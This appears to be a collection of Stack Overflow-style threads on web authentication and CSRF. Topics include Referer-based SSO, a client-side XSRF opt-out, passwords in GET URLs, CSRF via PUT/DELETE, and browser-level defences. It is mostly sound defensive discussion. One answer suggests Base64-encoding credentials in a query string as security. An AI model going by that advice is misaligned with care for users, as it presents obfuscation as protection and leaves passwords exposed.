As part of a project with a partner, we are required to provide single-sign-on service on our app. Basically, people will log in through our partner's website, then they are redirected to ours. The redirected request will have the user's data in the HTTP header fields.
Here's where it gets "iffy". The process of authenticating if this request is valid or not is dependent on the value of the HTTP Referer field. Our partner tells us to check this field to see that the source is a legitimate one.
Now I know (and I'm glad to be proven wrong) that this field is easy enough to forge, and since no other method of authentication is given to us, a malicious user could easily construct a false HTTP request and gain access to our web app.
I'm a programmer first, and admittedly know very little about the intricacies of HTTP. So are my concerns real? Would using SSL (somehow) void this concern?
Remember that rule number one is never trust client input. Like any other client input, the Referer header is trivial to forge. SSL does nothing for you because you still rely on client input. Also, note that browsers SHOULD NOT send Referer to http pages when referred by https pages.
Additionally, consider that many privacy-conscious people and proxies (that individuals may not have any control over) might strip Referer headers from their requests, breaking your scheme.
To do this properly, you need to use something like OAuth or OpenID, where the protocols have been designed to be secure.
The HTTP Referrer header is unreliable: depending on the browser used it may not be sent.
Does http-equiv="refresh" keep referrer info and metadata?
Yes - It is forgeable.
No - A client can just as easily send a (fake) HTTPS request as a (fake) HTTP request. The only difference is the connection is encrypted. It says nothing about the data transmitted.
That being said, it is another precaution that can be used. It should not be relied upon for security, however.
I would look at Microsoft Federation -- it's likely overkill, but it shows one way to implement SSO securely.
Related
Some time ago I came across the option in one of the software I use at work, to turn off XSRF server-side protection by including a special HTTP header value on the client side. Therefore, I wonder:
How is this not a security vulnerability?
Why would you implement a security feature and allow clients to turn it off? Is there a use-case I am missing?
I am doubting my knowledge of XSRF protection at the moment and since we could not reach a consensus at work I decided to post my concerns here.
The product is Bamboo and they publicly report the option in https://confluence.atlassian.com/bamkb/rest-api-calls-fail-due-to-missing-xsrf-token-899447048.html#RESTAPIcallsfailduetoMissingXSRFToken-Workaround. I first mentioned this in an old answer here: https://stackoverflow.com/a/45090321/410939.
I can understand allowing the server to turn it off on a per API basis. However allowing the client to turn it off is a very bad idea... It's as good as not being there. The only reason I can think this is OK is for backwards compatibility. Maybe there is an older version of the client that relies on this way to mitigate CSRF, while newer clients use the new version, and switch off the older version (but one of them must be used).
I would turn the question around: Why would you implement security features and then ask users to turn them on? This is the opt-in model to security you will find everywhere, e.g. literally no one are forcing 2FA even though it is a huge security improvement.
If XSRF is session based and you run multiple tabs with the same application and you are forced to reauthenticate in one of them you will typically get a new XSRF token. Other tabs might then no longer pass the XSRF check with the risk of losing unsaved work. There could possibly be other similar scenarios.
There are sometimes trade offs between security and usability, in this case they make security default and let people who run into problems take an informed risk.
There are other ways to mitigate XSRF. So, if cookie is not an option (maybe the client doesn't support cookie), you might want to disable this cookie solution.
Some other ways to mitigate XSRF:
State Variable (Auth0 uses it) - The client will generate and pass with every request a cryptographically strong random nonce which the server will echo back along with its response allowing the client to validate the nonce. It's explained in Auth0 doc
Always check the referer header and accept requests only when referer is a trusted domain. If referer header is absent or a non-whitelisted domain, simply reject the request. When using SSL/TLS referrer is usually present. Landing pages (that is mostly informational and not containing login form or any secured content may be little relaxed and allow requests with missing referer header
I would like in Liferay to allow only logged in users to do post requests, and at the same time deny other Post request sources, like from Postman, for example.
With the caveat that I am not familiar with Liferay itself, I can tell you that in a general Web application what you are asking is impossible.
Let's consider the problem in its simplest form:
A Web application makes POST requests to a server
The server should allow requests only from a logged-in user using the Web application
The server is stateless - that is, each request must be considered atomically. There is no persistent connection and no state is preserved at the server.
So - let's consider what happens when the browser makes a POST:
An HTTP connection is opened to the server
The HTTP headers are sent, including any site cookies that have previously been set by the server, and special headers like the User Agent and referrer
The form data is posted to the server
The server processes the request and returns a response
How does the server know that the user is logged in? In most cases, this is done by checking a cookie that is sent with the request and verifying that it is correct - cryptographically signed, for instance.
Now let's consider a Postman request. Exactly what is the difference between a request submitted through Postman and one submitted through the browser? None. There is no difference. It is trivially simple to examine and retrieve the cookies sent on a legitimate request from the browser, and include those headers in a faked Postman request.
Let's consider what you might do to prevent this.
1. Set and verify extra cookies - won't work because we can still retrieve those cookies just like we did with the login session
2. Encrypt the connection so the cookies can't be captured over the wire - won't work because I can capture the cookies from the browser
3. Check the User Agent to ensure that it is sent by a browser - won't work because I can spoof the headers to any value I want
4. Check the Referrer to ensure the request came from a valid page on my site (this is part of a Cross-Site Request Forgery mitigation) - won't work because I can always spoof the Referrer to any value I want
5. Add logic (JavaScript) into the page to compute some validity token - won't work because I can still read the JavaScript (it's client-side) and fake my own token
By the very nature of the Web system, this problem is insoluble. Because you (the server/application writer) do not have complete control over both sides of the communication, it is always possible to spoof requests from the client. The best you can do is prevent arbitrary requests from arbitrary users who do not have valid credentials. However, any request that includes the correct security tokens must be considered valid, whether it is generated from a browser/web page or crafted by hand or through some other application. At best, you will needlessly complicate your application for no significant improvement in security. You can prevent CSRF attacks and some other injection-type attacks, but because you as the client can always read whatever is sent from the server and can always craft your own requests, you can always provide a valid request.
Clarification
Can you please explain exactly what you are trying to accomplish? Are you trying to disable guest access completely, even through "valid" referrers (a user actually submitting a form) or are you trying to prevent post requests coming from other referrers?
If you are just worried about referrer forgeries you can set the following property in your portal-ext.properties file.
auth.token.check.enabled = true
If you want to remove all permissions for the guest role you can simply go into the portal's control panel, go into Configuration and then into the permissions table. Unchecked the entire row associated with guest.
That should do it. If you can't find those permissions post your exact Liferay version.
We have webpage which uses the sapui5-framework to build a spa. The communication between the browser and the server uses https. The interaction to log into the page is the following:
The user opens the website by entering https://myserver.com in the browser
A login dialogue with two form fields for unsername and password is shown.
After entering username and password and pressing the login-button
an ajax-request is send using GET to the URL: https://myusername:myPassword#myserver.com/foo/bar/metadata
According to my understanding using GET to send sensitive data is never a good idea. But this answer to HTTPS is the url string secure says the following
HTTPS Establishes an underlying SSL conenction before any HTTP data is
transferred. This ensures that all URL data (with the exception of
hostname, which is used to establish the connection) is carried solely
within this encrypted connection and is protected from
man-in-the-middle attacks in the same way that any HTTPS data is.
An in another answer in the same thread:
These fields [for example form field, query strings] are stripped off
of the URL when creating the routing information in the https packaging
process by the browser and are included in the encrypted data block.
The page data (form, text, and query string) are passed in the
encrypted block after the encryption methods are determined and the
handshake completes.
But it seems that there still might be security concerns using get:
the URL is stored in the logs on the server and in the same thread
leakage through browser history
Is this the case for URLs like?
https://myusername:myPassword#myserver.com/foo/bar/metadata
// or
https://myserver.com/?user=myUsername&pass=MyPasswort
Additional questions on this topic:
Is passsing get variables over ssl secure
Is sending a password in json over https considered secure
How to send securely passwords via GET/POST?
On security.stackexchange are additional informations:
can urls be sniffed when using ssl
ssl with get and post
But in my opinion a few aspects are still not answered
Question
In my opinion the mentioned points are valid objections to not use get. Is the case; is using get for sending passwords a bad idea?
Are these the attack options, are there more?
browser history
server logs (assuming that the url is stored in the logs unencrypted or encrypted)
referer information (if this is really the case)
Which attack options do exist when sending sensitive data (password) over https using get?
Thanks
Sending any kind of sensitive data over GET is dangerous, even if it is HTTPS. These data might end up in log files at the server and will be included in the Referer header in links to or includes from other sides. They will also be saved in the history of the browser so an attacker might try to guess and verify the original contents of the link with an attack against the history.
Apart from that you better ask that kind of questions at security.stackexchange.com.
These two approaches are fundamentally different:
https://myusername:myPassword#myserver.com/foo/bar/metadata
https://myserver.com/?user=myUsername&pass=MyPasswort
myusername:myPassword# is the "User Information" (this form is actually deprecated in the latest URI RFC), whereas ?user=myUsername&pass=MyPasswort is part of the query.
If you look at this example from RFC 3986:
foo://example.com:8042/over/there?name=ferret#nose
\_/ \______________/\_________/ \_________/ \__/
| | | | |
scheme authority path query fragment
| _____________________|__
/ \ / \
urn:example:animal:ferret:nose
myusername:myPassword# is part of the authority. In practice, use HTTP (Basic) authentication headers will generally be used to convey this information. On the server side, headers are generally not logged (and if they are, whether the client entered them into their location bar or via an input dialog would make no difference). In general (although it's implementation dependent), browsers don't store it in the location bar, or at least they remove the password. It appears that Firefox keeps the userinfo in the browser history, while Chrome doesn't (and IE doesn't really support them without workaround)
In contrast, ?user=myUsername&pass=MyPasswort is the query, a much more integral part of the URI, and it is send as the HTTP Request-URI. This will be in the browser's history and the server's logs. This will also be passed in the referrer.
To put it simply, myusername:myPassword# is clearly designed to convey information that is potentially sensitive, and browsers are generally designed to handle this appropriately, whereas browsers can't guess which part of which queries are sensitive and which are not: expect information leakage there.
The referrer information will also generally not leak to third parties, since the Referer header coming from an HTTPS page is normally only sent with other request on HTTPS to the same host. (Of course, if you have used https://myserver.com/?user=myUsername&pass=MyPasswort, this will be in the logs of that same host, but you're not making it much worth since it stays on the same server logs.)
This is specified in the HTTP specification (Section 15.1.3):
Clients SHOULD NOT include a Referer header field in a (non-secure) HTTP request if the referring page was transferred with a secure protocol.
Although it is just a "SHOULD NOT", Internet Explorer, Chrome and Firefox seem to implement it this way. Whether this applies to HTTPS requests from one host to another depends on the browser and its version.
It is now possible to override this behaviour, as described in this question and this draft specification, using a <meta> header, but you wouldn't do that on a sensitive page that uses ?user=myUsername&pass=MyPasswort anyway.
Note that the rest of HTTP specification (Section 15.1.3) is also relevant:
Authors of services which use the HTTP protocol SHOULD NOT use GET based forms for the submission of sensitive data, because this will cause this data to be encoded in the Request-URI. Many existing servers, proxies, and user agents will log the request URI in some place where it might be visible to third parties. Servers can use POST-based form submission instead
Using ?user=myUsername&pass=MyPasswort is exactly like using a GET based form and, while the Referer issue can be contained, the problems regarding logs and history remain.
Let assume that user clicked a button and following request generated by client browser.
https://www.site.com/?username=alice&password=b0b123!
HTTPS
First thing first. HTTPS is not related with this topic. Because using POST or GET does not matter from attacker perspective. Attackers can easily grab sensitive data from query string or directly POST request body when traffic is HTTP. Therefor it does not make any difference.
Server Logs
We know that Apache, Nginx or other services logging every single HTTP request into log file. Which means query string ( ?username=alice&password=b0b123! ) gonna be written into log files. This can be dangerous because of your system administrator can access this data too and grab all user credentials. Also another case could be happen when your application server compromise. I believe you are storing password as hashed. If you use powerful hashing algorithm like SHA256, your client's password will be more secure against hackers. But hackers can access log files directly get passwords as a plain-text with very basic shell scripts.
Referer Information
We assumed that client opened above link. When client browser get html content and try to parse it, it will see image tag. This images can be hosted at out of your domain ( postimage or similar services, or directly a domain that under the hacker's control ) . Browser make a HTTP request in order to get image. But current url is https://www.site.com/?username=alice&password=b0b123! which is going to be referer information!
That means alice and her password will be passed to another domain and can be accessible directly from web logs. This is really important security issue.
This topic reminds me to Session Fixation Vulnerabilities. Please read following OWASP article for almost same security flaw with sessions. ( https://www.owasp.org/index.php/Session_fixation ) It's worth to read it.
The community has provided a broad view on the considerations, the above stands with respect to the question. However, GET requests may, in general, need authentication. As observed above, sending user name/password as part of the URL is never correct, however, that is typically not the way authentication information is usually handled. When a request for a resource is sent to the server, the server generally responds with a 401 and Authentication header in the response, against which the client sends an Authorization header with the authentication information (in the Basic scheme). Now, this second request from client can be a POST or a GET request, nothing prevents that. So, generally, it is not the request type but the mode of communicating the information is in question.
Refer http://en.wikipedia.org/wiki/Basic_access_authentication
Consider this:
https://www.example.com/login
Javascript within login page:
$.getJSON("/login?user=joeblow&pass=securepassword123");
What would the referer be now?
If you're concerned about security, an extra layer could be:
var a = Base64.encode(user.':'.pass);
$.getJSON("/login?a="+a);
Although not encrypted, at least the data is obscured from plain sight.
Is CSRF possible with PUT or DELETE methods? Or does the use of PUT or DELETE prevent CSRF?
Great question!
In a perfect world, I can't think of a way to perform a CSRF attack.
You cannot make PUT or DELETE requests using HTML forms.
Images, Script tags, CSS Links etc all send GET requests to the server.
XmlHttpRequest and browser plugins such as Flash/Silverlight/Applets will block cross-domain requests.
So, in general, it shouldn't be possible to make a CSRF attack to a resource that supports PUT/DELETE verbs.
That said, the world isn't perfect. There may be several ways in which such an attack can be made possible :
Web Frameworks such as Rails have support for "pseudo method". If you put a hidden field called _method, set its value to PUT or DELETE, and then submit a GET or POST request, it will override the HTTP Verb. This is a way to support PUT or DELETE from browser forms. If you are using such a framework, you will have to protect yourself from CSRF using standard techniques
You may accidentally setup a lax response headers for CORS on your server. This would allow arbitrary websites to make PUT and DELETE requests.
At some point, HTML5 had planned to include support for PUT and DELETE in HTML Forms. But later, they removed that support. There is no guarantee that it won't be added later. Some browsers may actually have support for these verbs, and that can work against you.
There may just be a bug in some browser plugin that could allow the attacker to make PUT/DELETE requests.
In short, I would recommend protecting your resources even if they only support PUT and DELETE methods.
Yes, CSRF is possible with the PUT and DELETE methods, but only with CORS enabled with an unrestrictive policy.
I disagree with Sripathi Krishnan's answer:
XmlHttpRequest and browser plugins such as Flash/Silverlight/Applets
will block cross-domain requests
Nothing stops the browser from making a cross-domain request. The Same Origin Policy does not prevent a request from being made - all it does is prevent the request from being read by the browser.
If the server is not opting into CORS, this will cause a preflight request to be made. This is the mechanism that will prevent a PUT or DELETE from being used, because it is not a simple request (the method needs to be HEAD, GET or POST). Assuming a properly locked down CORS policy of course (or none at all which is secure by default).
No. Relying on an HTTP verb is not a way to prevent a CSRF attack. It's all in how your site is created. You can use PUTs as POSTs and DELETEs as GETs - it doesn't really matter.
To prevent CSRF, take some of the steps outlined here:
Web sites have various CSRF countermeasures available:
Requiring a secret, user-specific token in all form submissions and side-effect URLs prevents CSRF; the attacker's site cannot put the
right token in its submissions1
Requiring the client to provide authentication data in the same HTTP Request used to perform any operation with security
implications (money transfer, etc.)
Limiting the lifetime of session cookies Checking the HTTP Referer header or(and)
Checking the HTTP Origin header[16]
Ensuring that there is no clientaccesspolicy.xml file granting unintended access to Silverlight controls[17]
Ensuring that there is no crossdomain.xml file granting unintended access to Flash movies[18]
Verifying that the request's header contains a X-Requested-With. Used by Ruby on Rails (before v2.0) and Django (before v1.2.5).
This protection has been proven unsecure[19] under a combination of
browser plugins and redirects which can allow an attacker to
provide custom HTTP headers on a request to any website, hence
allow a forged request.
In theory it should not be possible as there is no way to initiate a cross-domain PUT or DELETE request (except for CORS, but that needs a preflight request and thus the target site's cooperation). In practice I would not rely on that - many systems have been bitten by e.g. assuming that a CSRF file upload attack was not possible (it should not be, but certain browser bugs made it possible).
CSRF is indeed possible with PUT and DELETE depending on the configuration of your server.
The easiest way to think about CSRF is to think of having two tabs open in your browser, one open to your application with your user authenticated, and the other tab open to a malicious website.
If the malicious website makes a javascript request to your application, the browser will send the standard cookies with the request, thus allowing the malicious website to 'forge' the request using the already authenticated session. That website can do any type of request that it wants to, including GET, PUT, POST, DELETE, etc.
The standard way to defend against CSFR is to send something along with the request that the malicious website cannot know. This can be as simple as the contents of one of the cookies. While the request from the malicious site will have the cookies sent with it, it cannot actually access the cookies because it is being served by a different domain and browser security prevents it from accessing the cookies for another domain.
Call the cookie content a 'token'. You can send the token along with requests, and on the server, make sure the 'token' has been correctly provided before proceeding with the request.
The next question is how do you send that value with all the different requests, with DELETE specifically difficult since it is not designed to have any kind of payload. In my opinion, the cleanest way is to specify a request header with the token. Something like this x-security-token = token. That way, you can look at the headers of incoming requests, and reject any that are missing the token.
In the past, standard ajax security restricted what could be done via ajax on the malicious server, however, now-a-days, the vulnerability depends on how you have your server set up with regards to accees-control configurations. Some people open up their server to make it easier to make cross domain calls or for users to make their own RESTful clients or the like, but that also makes it easier for a malicious site to take advantage unless CSRF prevention methods like the ones above are put in place.
What changes to the HTTP protocol spec, and to browser behaviour, would be required to prevent dangerous cases of cross-site request forgery?
I am not looking for suggestions as to how to patch my own web app. There are millions of vulnerable web apps and forms. It would be easier to change HTTP and/or the browsers.
If you agree to my premise, please tell me what changes to the HTTP and/or browser behaviour are needed. This is not a competition to find the best single answer, I want to collect all the good answers.
Please also read and comment on the points in my 'answer' below.
Roy Fielding, author of the HTTP specification, disagrees with your opinion, that CSRF is a flaw in HTTP and would need to be fixed there. As he wrote in a reply in a thread named The HTTP Origin Header:
CSRF is not a security issue for the Web. A well-designed Web
service should be capable of receiving requests directed by any host,
by design, with appropriate authentication where needed. If browsers
create a security issue because they allow scripts to automatically
direct requests with stored security credentials onto third-party
sites, without any user intervention/configuration, then the obvious
fix is within the browser.
And in fact, CSRF attacks were possible right from the beginning using plain HTML. The introduction of nowadays technologies like JavaScript and CSS did only introduce further attack vectors and techniques that made request forging easier and more efficient.
But it didn’t change the fact that a legitimate and authentic request from a client is not necessarily based on the user’s intention. Because browsers do send requests automatically all the time (e. g. images, style sheets, etc.) and send any authentication credentials along.
Again, CSRF attacks happen inside the browser, so the only possible fix would need to be to fix it there, inside the browser.
But as that is not entirely possible (see above), it’s the application’s duty to implement a scheme that allows to distinguish between authentic and forged requests. The always propagated CSRF token is such a technique. And it works well when implemented properly and protected against other attacks (many of them, again, only possible due to the introduction of modern technologies).
I agree with the other two; this could be done on the browser-side, but would make impossible to perform authorized cross-site requests.
Anyways, a CSRF protection layer could be added quite easily on the application side (and, maybe, even on the webserver-side, in order to avoid making changes to pre-existing applications) using something like this:
A cookie is set to a random value, known only by server (and, of course, the client receiving it, but not a 3rd party server)
Each POST form must contain a hidden field whose value must be the same of the cookie. If not, form submission must be prevented and a 403 page returned to the user.
Enforce the Same Origin Policy for form submission locations. Only allow a form to be submitted back to the place it came from.
This, of course, would break all sorts of other things.
If you look at the CSRF prevention cheat sheet you can see that there are ways of preventing CSRF by relying upon the HTTP protocol. A good example is checking the HTTP referer which is commonly used on embedded devices because it doesn't require additional memory.
However, this is weak form of protection. A vulnerability like HTTP response splitting on the client side could be used to influence the referer value, and this has happened.
cookies should be declared 'local' (default) or 'remote'
the browser must not send 'local' cookies with a cross-site request
the browser must never send http-auth headers with a cross-site request
the browser must not send a cross-site POST or GET ?query without permission
the browser must not send LAN address requests from a remote page without permission
the browser must report and control attacks, where many cross-site requests are made
the browser should send 'Origin: (local|remote)', even if 'Referer' is disabled
other common web security issues such as XSHM should be addressed in the HTTP spec
a new HTTP protocol version 1.2 is needed, to show that a browser is conforming
browsers should update automatically to meet new security requirements, or warn the user
It can already be done:
Referer header
This is a weaker form of protection. Some users may disable referer for privacy purposes, meaning that they won't be able to submit such forms on your site. Also this can be tricky to implement in code. Some systems allow a URL such as http://example.com?q=example.org to pass the referrer check for example.org. Finally, any open redirect vulnerabilities on your site may allow an attacker to send their CSRF attack through the open redirect in order to get the correct referer header.
Origin header
This is a new header. Unfortunately you will get inconsistencies between browsers that support it and do not support it. See this answer.
Other headers
For AJAX requests only, adding a header that is not allowed cross domain such as X-Requested-With can be used as a CSRF prevention method. Old browsers will not send XHR cross domain and new browsers will send a CORS preflight instead and then refuse to make the main request if it is explicitly not allowed by the target domain. The server-side code will need to ensure that the header is still present when the request is received. As HTML forms cannot have custom headers added, this method is incompatible with them. However, this also means that it protects against attackers using an HTML form in their CSRF attack.
Browsers
Browsers such as Chrome allow third party cookies to be blocked. Although the explanation says that it'll stop cookies from being set by a third party domain, it also prevent any existing cookies from being sent for the request. This will block "background" CSRF attacks. However, those that open full page or in a popup will succeed, but will be more visible to the user.